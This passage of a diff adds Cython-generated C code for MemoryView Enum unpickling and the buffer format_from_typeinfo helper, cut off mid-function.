__pyx_n_s_pyx_checksum)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle_Enum", 1, 3, 3, 1); __PYX_ERR(1, 1, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle_Enum", 1, 3, 3, 2); __PYX_ERR(1, 1, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__pyx_unpickle_Enum") < 0)) __PYX_ERR(1, 1, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v___pyx_type = values[0]; + __pyx_v___pyx_checksum = __Pyx_PyInt_As_long(values[1]); if (unlikely((__pyx_v___pyx_checksum == (long)-1) && PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + __pyx_v___pyx_state = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle_Enum", 1, 3, 3, __pyx_nargs); __PYX_ERR(1, 1, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.__pyx_unpickle_Enum", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15View_dot_MemoryView___pyx_unpickle_Enum(__pyx_self, __pyx_v___pyx_type, __pyx_v___pyx_checksum, __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView___pyx_unpickle_Enum(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v___pyx_type, long __pyx_v___pyx_checksum, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_v___pyx_PickleError = 0; + PyObject *__pyx_v___pyx_result = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_unpickle_Enum", 0); + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + */ + __pyx_t_1 = __Pyx_PyInt_From_long(__pyx_v___pyx_checksum); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = (__Pyx_PySequence_ContainsTF(__pyx_t_1, __pyx_tuple__8, Py_NE)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (__pyx_t_2) { + + /* "(tree fragment)":5 + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): + * from pickle import PickleError as __pyx_PickleError # <<<<<<<<<<<<<< + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) + */ + __pyx_t_1 = PyList_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_s_PickleError); + __Pyx_GIVEREF(__pyx_n_s_PickleError); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_s_PickleError); + __pyx_t_3 = __Pyx_Import(__pyx_n_s_pickle, __pyx_t_1, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_PickleError); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_t_1); + __pyx_v___pyx_PickleError = __pyx_t_1; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":6 + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum # <<<<<<<<<<<<<< + * __pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: + */ + __pyx_t_3 = __Pyx_PyInt_From_long(__pyx_v___pyx_checksum); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_Incompatible_checksums_0x_x_vs_0, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_v___pyx_PickleError, __pyx_t_1, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(1, 6, __pyx_L1_error) + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0x82a3537, 0x6ae9995, 0xb068931): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + */ + } + + /* "(tree fragment)":7 + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) # <<<<<<<<<<<<<< + * if __pyx_state is not None: + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_MemviewEnum_type), __pyx_n_s_new); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_4, __pyx_v___pyx_type}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_v___pyx_result = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":8 + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + */ + __pyx_t_2 = (__pyx_v___pyx_state != Py_None); + if (__pyx_t_2) { + + /* "(tree fragment)":9 + * __pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) # <<<<<<<<<<<<<< + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + */ + if (!(likely(PyTuple_CheckExact(__pyx_v___pyx_state))||((__pyx_v___pyx_state) == Py_None) || __Pyx_RaiseUnexpectedTypeError("tuple", __pyx_v___pyx_state))) __PYX_ERR(1, 9, __pyx_L1_error) + __pyx_t_1 = __pyx_unpickle_Enum__set_state(((struct __pyx_MemviewEnum_obj *)__pyx_v___pyx_result), ((PyObject*)__pyx_v___pyx_state)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 9, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":8 + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + */ + } + + /* "(tree fragment)":10 + * if __pyx_state is not None: + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result # <<<<<<<<<<<<<< + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v___pyx_result); + __pyx_r = __pyx_v___pyx_result; + goto __pyx_L0; + + /* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.__pyx_unpickle_Enum", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v___pyx_PickleError); + __Pyx_XDECREF(__pyx_v___pyx_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":11 + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): # <<<<<<<<<<<<<< + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + */ + +static PyObject *__pyx_unpickle_Enum__set_state(struct __pyx_MemviewEnum_obj *__pyx_v___pyx_result, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + int __pyx_t_8; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_unpickle_Enum__set_state", 0); + + /* "(tree fragment)":12 + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] # <<<<<<<<<<<<<< + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[1]) + */ + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + __Pyx_GOTREF(__pyx_v___pyx_result->name); + __Pyx_DECREF(__pyx_v___pyx_result->name); + __pyx_v___pyx_result->name = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":13 + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): # <<<<<<<<<<<<<< + * __pyx_result.__dict__.update(__pyx_state[1]) + */ + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(1, 13, __pyx_L1_error) + } + __pyx_t_3 = PyTuple_GET_SIZE(__pyx_v___pyx_state); if (unlikely(__pyx_t_3 == ((Py_ssize_t)-1))) __PYX_ERR(1, 13, __pyx_L1_error) + __pyx_t_4 = (__pyx_t_3 > 1); + if (__pyx_t_4) { + } else { + __pyx_t_2 = __pyx_t_4; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_4 = __Pyx_HasAttr(((PyObject *)__pyx_v___pyx_result), __pyx_n_s_dict); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(1, 13, __pyx_L1_error) + __pyx_t_2 = __pyx_t_4; + __pyx_L4_bool_binop_done:; + if (__pyx_t_2) { + + /* "(tree fragment)":14 + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[1]) # <<<<<<<<<<<<<< + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v___pyx_result), __pyx_n_s_dict); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_update); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 14, __pyx_L1_error) + } + __pyx_t_5 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_7 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_6))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_6); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_6, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_7, __pyx_t_5}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_8, 1+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":13 + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): # <<<<<<<<<<<<<< + * __pyx_result.__dict__.update(__pyx_state[1]) + */ + } + + /* "(tree fragment)":11 + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): # <<<<<<<<<<<<<< + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("View.MemoryView.__pyx_unpickle_Enum__set_state", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "BufferFormatFromTypeInfo":1450 + * + * @cname('__pyx_format_from_typeinfo') + * cdef bytes format_from_typeinfo(__Pyx_TypeInfo *type): # <<<<<<<<<<<<<< + * cdef __Pyx_StructField *field + * cdef __pyx_typeinfo_string fmt + */ + +static PyObject *__pyx_format_from_typeinfo(__Pyx_TypeInfo *__pyx_v_type) { + __Pyx_StructField *__pyx_v_field; + struct __pyx_typeinfo_string __pyx_v_fmt; + PyObject *__pyx_v_part = 0; + PyObject *__pyx_v_result = 0; + PyObject *__pyx_v_alignment = NULL; + PyObject *__pyx_v_parts = NULL; + PyObject *__pyx_v_extents = NULL; + Py_ssize_t __pyx_7genexpr__pyx_v_i; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + __Pyx_StructField *__pyx_t_3; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + int __pyx_t_7; + int __pyx_t_8; + Py_ssize_t __pyx_t_9; + Py_UCS4 __pyx_t_10; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("format_from_typeinfo", 0); + + /* "BufferFormatFromTypeInfo":1456 + * cdef Py_ssize_t i + * + * if type.typegroup == 'S': # <<<<<<<<<<<<<< + * assert type.fields != NULL + * assert type.fields.type != NULL + */ + __pyx_t_1 = (__pyx_v_type->typegroup == 'S'); + if (__pyx_t_1) { + + /* "BufferFormatFromTypeInfo":1457 + * + * if type.typegroup == 'S': + * assert type.fields != NULL # <<<<<<<<<<<<<< + * assert type.fields.type != NULL + * + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_1 = (__pyx_v_type->fields != NULL); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(1, 1457, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(1, 1457, __pyx_L1_error) + #endif + + /* "BufferFormatFromTypeInfo":1458 + * if type.typegroup == 'S': + * assert type.fields != NULL + * assert type.fields.type != NULL # <<<<<<<<<<<<<< + * + * if type.flags & __PYX_BUF_FLAGS_PACKED_STRUCT: + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_1 = (__pyx_v_type->fields->type != NULL); + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(1, 1458, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(1, 1458, __pyx_L1_error) + #endif + + /* "BufferFormatFromTypeInfo":1460 + * assert type.fields.type != NULL + * + * if type.flags & __PYX_BUF_FLAGS_PACKED_STRUCT: # <<<<<<<<<<<<<< + * alignment = b'^' + * else: + */ + __pyx_t_1 = ((__pyx_v_type->flags & __PYX_BUF_FLAGS_PACKED_STRUCT) != 0); + if (__pyx_t_1) { + + /* "BufferFormatFromTypeInfo":1461 + * + * if type.flags & __PYX_BUF_FLAGS_PACKED_STRUCT: + * alignment = b'^' # <<<<<<<<<<<<<< + * else: + * alignment = b'' + */ + __Pyx_INCREF(__pyx_kp_b__9); + __pyx_v_alignment = __pyx_kp_b__9; + + /* "BufferFormatFromTypeInfo":1460 + * assert type.fields.type != NULL + * + * if type.flags & __PYX_BUF_FLAGS_PACKED_STRUCT: # <<<<<<<<<<<<<< + * alignment = b'^' + * else: + */ + goto __pyx_L4; + } + + /* "BufferFormatFromTypeInfo":1463 + * alignment = b'^' + * else: + * alignment = b'' # <<<<<<<<<<<<<< + * + * parts = [b"T{"] + */ + /*else*/ { + __Pyx_INCREF(__pyx_kp_b__10); + __pyx_v_alignment = __pyx_kp_b__10; + } + __pyx_L4:; + + /* "BufferFormatFromTypeInfo":1465 + * alignment = b'' + * + * parts = [b"T{"] # <<<<<<<<<<<<<< + * field = type.fields + * + */ + __pyx_t_2 = PyList_New(1); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1465, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_INCREF(__pyx_kp_b_T); + __Pyx_GIVEREF(__pyx_kp_b_T); + PyList_SET_ITEM(__pyx_t_2, 0, __pyx_kp_b_T); + __pyx_v_parts = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "BufferFormatFromTypeInfo":1466 + * + * parts = [b"T{"] + * field = type.fields # <<<<<<<<<<<<<< + * + * while field.type: + */ + __pyx_t_3 = __pyx_v_type->fields; + __pyx_v_field = __pyx_t_3; + + /* "BufferFormatFromTypeInfo":1468 + * field = type.fields + * + * while field.type: # <<<<<<<<<<<<<< + * part = format_from_typeinfo(field.type) + * parts.append(part + b':' + field.name + b':') + */ + while (1) { + __pyx_t_1 = (__pyx_v_field->type != 0); + if (!__pyx_t_1) break; + + /* "BufferFormatFromTypeInfo":1469 + * + * while field.type: + * part = format_from_typeinfo(field.type) # <<<<<<<<<<<<<< + * parts.append(part + b':' + field.name + b':') + * field += 1 + */ + __pyx_t_2 = __pyx_format_from_typeinfo(__pyx_v_field->type); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_XDECREF_SET(__pyx_v_part, ((PyObject*)__pyx_t_2)); + __pyx_t_2 = 0; + + /* "BufferFormatFromTypeInfo":1470 + * while field.type: + * part = format_from_typeinfo(field.type) + * parts.append(part + b':' + field.name + b':') # <<<<<<<<<<<<<< + * field += 1 + * + */ + __pyx_t_2 = PyNumber_Add(__pyx_v_part, __pyx_kp_b__11); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1470, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyBytes_FromString(__pyx_v_field->name); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1470, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyNumber_Add(__pyx_t_2, __pyx_t_4); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 1470, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = PyNumber_Add(__pyx_t_5, __pyx_kp_b__11); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1470, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_6 = __Pyx_PyList_Append(__pyx_v_parts, __pyx_t_4); if (unlikely(__pyx_t_6 == ((int)-1))) __PYX_ERR(1, 1470, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "BufferFormatFromTypeInfo":1471 + * part = format_from_typeinfo(field.type) + * parts.append(part + b':' + field.name + b':') + * field += 1 # <<<<<<<<<<<<<< + * + * result = alignment.join(parts) + b'}' + */ + __pyx_v_field = (__pyx_v_field + 1); + } + + /* "BufferFormatFromTypeInfo":1473 + * field += 1 + * + * result = alignment.join(parts) + b'}' # <<<<<<<<<<<<<< + * else: + * fmt = __Pyx_TypeInfoToFormat(type) + */ + __pyx_t_4 = __Pyx_PyBytes_Join(__pyx_v_alignment, __pyx_v_parts); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1473, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyNumber_Add(__pyx_t_4, __pyx_kp_b__12); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 1473, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (!(likely(PyBytes_CheckExact(__pyx_t_5))||((__pyx_t_5) == Py_None) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_t_5))) __PYX_ERR(1, 1473, __pyx_L1_error) + __pyx_v_result = ((PyObject*)__pyx_t_5); + __pyx_t_5 = 0; + + /* "BufferFormatFromTypeInfo":1456 + * cdef Py_ssize_t i + * + * if type.typegroup == 'S': # <<<<<<<<<<<<<< + * assert type.fields != NULL + * assert type.fields.type != NULL + */ + goto __pyx_L3; + } + + /* "BufferFormatFromTypeInfo":1475 + * result = alignment.join(parts) + b'}' + * else: + * fmt = __Pyx_TypeInfoToFormat(type) # <<<<<<<<<<<<<< + * result = fmt.string + * if type.arraysize[0]: + */ + /*else*/ { + __pyx_v_fmt = __Pyx_TypeInfoToFormat(__pyx_v_type); + + /* "BufferFormatFromTypeInfo":1476 + * else: + * fmt = __Pyx_TypeInfoToFormat(type) + * result = fmt.string # <<<<<<<<<<<<<< + * if type.arraysize[0]: + * extents = [f"{type.arraysize[i]}" for i in range(type.ndim)] + */ + __pyx_t_5 = __Pyx_PyObject_FromString(__pyx_v_fmt.string); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 1476, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_v_result = ((PyObject*)__pyx_t_5); + __pyx_t_5 = 0; + + /* "BufferFormatFromTypeInfo":1477 + * fmt = __Pyx_TypeInfoToFormat(type) + * result = fmt.string + * if type.arraysize[0]: # <<<<<<<<<<<<<< + * extents = [f"{type.arraysize[i]}" for i in range(type.ndim)] + * result = f"({u','.join(extents)})".encode('ascii') + result + */ + __pyx_t_1 = ((__pyx_v_type->arraysize[0]) != 0); + if (__pyx_t_1) { + + /* "BufferFormatFromTypeInfo":1478 + * result = fmt.string + * if type.arraysize[0]: + * extents = [f"{type.arraysize[i]}" for i in range(type.ndim)] # <<<<<<<<<<<<<< + * result = f"({u','.join(extents)})".encode('ascii') + result + * + */ + { /* enter inner scope */ + __pyx_t_5 = PyList_New(0); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 1478, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_7 = __pyx_v_type->ndim; + __pyx_t_8 = __pyx_t_7; + for (__pyx_t_9 = 0; __pyx_t_9 < __pyx_t_8; __pyx_t_9+=1) { + __pyx_7genexpr__pyx_v_i = __pyx_t_9; + __pyx_t_4 = __Pyx_PyUnicode_From_size_t((__pyx_v_type->arraysize[__pyx_7genexpr__pyx_v_i]), 0, ' ', 'd'); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1478, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_5, (PyObject*)__pyx_t_4))) __PYX_ERR(1, 1478, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + } /* exit inner scope */ + __pyx_v_extents = ((PyObject*)__pyx_t_5); + __pyx_t_5 = 0; + + /* "BufferFormatFromTypeInfo":1479 + * if type.arraysize[0]: + * extents = [f"{type.arraysize[i]}" for i in range(type.ndim)] + * result = f"({u','.join(extents)})".encode('ascii') + result # <<<<<<<<<<<<<< + * + * return result + */ + __pyx_t_5 = PyTuple_New(3); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 1479, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_9 = 0; + __pyx_t_10 = 127; + __Pyx_INCREF(__pyx_kp_u__13); + __pyx_t_9 += 1; + __Pyx_GIVEREF(__pyx_kp_u__13); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_kp_u__13); 